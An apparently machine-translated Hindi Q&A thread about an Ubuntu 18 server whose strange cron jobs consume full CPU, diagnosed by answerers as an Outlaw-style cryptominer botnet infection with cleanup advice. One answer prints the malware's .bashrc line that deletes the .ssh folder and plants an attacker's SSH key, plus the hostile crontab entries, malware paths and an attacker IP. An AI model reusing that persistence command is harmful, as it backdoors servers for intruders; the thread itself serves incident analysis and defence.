अजीब क्रोन जॉब सीपीयू उबंटू 18 एलटीएस सर्वर का 100% लेता है

मैं वियर क्रोन जॉब्स दिखाता रहता हूं और मुझे कोई सुराग नहीं है कि वे क्या करते हैं। मैं आमतौर पर उन्हें मारने के लिए -9 जारी करता हूं। वे मेरे सीपीयू का 100% हिस्सा लेते हैं और जब तक मैं जांच नहीं करता, तब तक चला सकता हूं। क्या किसी को पता है कि इसका क्या मतलब है?

sudo crontab -l
0 0 */3 * * /root/.firefoxcatche/a/upd>/dev/null 2>&1
@reboot /root/.firefoxcatche/a/upd>/dev/null 2>&1
5 8 * * 0 /root/.firefoxcatche/b/sync>/dev/null 2>&1
@reboot /root/.firefoxcatche/b/sync>/dev/null 2>&1
#5 1 * * * /tmp/.X13-unix/.rsync/c/aptitude>/dev/null 2>&1

मैं कल दिनांक 9/२४/२०११ तक पूरी तरह से अप-टू-डेट उबंटू १ am एलटीएस सर्वर चला रहा हूं

अद्यतन करें

मैं सभी प्रतिक्रिया की सराहना करता हूं। मैंने सभी डेटा और एप्लिकेशन ड्राइव को काट दिया है क्योंकि प्रभावित होने वाली एकमात्र चीज ओएस ड्राइव थी, मैंने कम से कम उस तरह की चीज को ठीक से किया था। मैं पूरी तरह से पुनर्निर्माण के साथ जा रहा हूं, बहुत अधिक सुरक्षा और अधिक सुरक्षित तरीकों के साथ।

आपकी मशीन की सबसे अधिक संभावना क्रिप्टो माइनर संक्रमण है। आप सिक्योरिटी सेंटर के साथ एज़्योर में एक वर्चुअल मशीन के वास्तविक जीवन का पता लगाने के लिए किसी और के नाम और व्यवहार की रिपोर्टिंग करते हुए देख सकते हैं । यह भी देखें मेरे उबंटू सर्वर में वायरस है ... मैंने इसे स्थित कर दिया है लेकिन मैं इससे छुटकारा नहीं पा सकता ... रेडिट पर।

आप अब उस मशीन पर भरोसा नहीं कर सकते हैं, और उसे फिर से स्थापित करना चाहिए। बैकअप बहाल करने के साथ सावधान रहें।

आपकी मशीन क्रिप्टो माइनर हमले से संक्रमित हो गई है। मुझे अतीत में भी इसी तरह के रैंसमवेयर हमले का सामना करना पड़ा था और मेरे डेटाबेस से समझौता किया गया था। मैंने मशीन के लिए एसक्यूएल डंप लिया और मशीन को रिप्रोड्यूस किया (क्योंकि मेरी मशीन एएमएस ईसी 2 पर होस्टेड वीएम थी)। मैंने SSH पहुंच और संशोधित पासवर्ड को लॉक करने के लिए मशीन के सुरक्षा समूहों को भी संशोधित किया। मैंने लॉगिंग क्वेरी को भी सक्षम किया और हर रात इसे S3 में निर्यात किया।

मेरे साथ भी ऐसा ही हुआ और मैंने कल गौर किया। मैंने फ़ाइल को चेक किया /var/log/syslogऔर यह IP (185.234.218.40) अपने आप क्रोनोजर को अंजाम देता हुआ दिखाई दिया।

मैंने इसे http://whatismyipaddress.com ( https://whatismyipaddress.com/ip/185.234.218.40 ) पर चेक किया और इसकी कुछ रिपोर्टें हैं। ट्रोजन द्वारा इन फाइलों को संपादित किया गया था:

• .bashrc
• .ssh / authorized_keys

मुझे यह सबसे अंत में मिला .bashrc(जो हर बार बैश खुलने पर निष्पादित होता है):

set +o history
export PATH=/home/user/.bin:$PATH
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~

यह आपकी authorized_keysफ़ाइल को हटा रहा है , जो SSH कुंजी की एक सूची है जिसे बिना पासवर्ड के कनेक्ट करने की अनुमति है। फिर, यह हमलावर की SSH कुंजी जोड़ता है:

ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr

इसके अलावा, मुझे यह फ़ोल्डर मिला: /tmp/.X13-unix/.rsyncजहां सभी मैलवेयर हैं। मुझे एक फ़ाइल भी मिली, /tmp/.X13-unix/.rsync/c/ipजिसमें 70 000 IP पतों वाली एक फ़ाइल थी, जिसमें सबसे अधिक संभावना अन्य पीड़ितों या नोड सर्वरों की थी।

2 समाधान हैं: ए:

• पोर्ट 22 और अन्य को छोड़कर सभी आउटगोइंग कनेक्शनों को अवरुद्ध करने वाला फ़ायरवॉल जोड़ें, जो आपको आवश्यक लगता है और fail2ban को सक्षम करता है, एक प्रोग्राम जो X विफल पासवर्ड प्रयासों के बाद एक आईपी पते पर प्रतिबंध लगाता है

• सभी क्रोन नौकरियों को मार डालो: ps aux | grep cronफिर पीआईडी ​​को मार डालो जो दिखाता है

• अपने पासवर्ड को सुरक्षित में बदलें

बी:

• उन फ़ाइलों या फ़ोल्डरों का बैकअप लें, जिनकी आपको आवश्यकता है या वे चाहते हैं

• सर्वर को रीसेट करें और उबंटू को पुनर्स्थापित करें, या सीधे एक नई छोटी बूंद बनाएं

  जैसे थॉम विगर्स ने कहा, आप निश्चित रूप से बिटकॉइन माइनिंग बॉटनेट का हिस्सा हैं, और आपके सर्वर में पिछले दरवाजे हैं । पिछले दरवाजे एक perl शोषण, एक फ़ाइल यहाँ स्थित है: /tmp/.X13-unix/.rsync/b/runइस युक्त ( https://pastebin.com/ceP2jsUy )

सबसे संदिग्ध फ़ोल्डर मुझे मिले:

• /tmp/.X13-unix/.rsync

• ~/.bashrc (जिसे संपादित किया गया था)

• ~/.firefoxcatche

अंत में, पर्ल बैकडोर से संबंधित एक लेख यहां दिया गया है: https://blog.trendmicro.com/trendlabs-security-intelligence/outlaw-hacking-groups-botnet-observed-spreading-miner-perl-based-backdoor/

मुझे उम्मीद है कि आपको यह काम का लगेगा।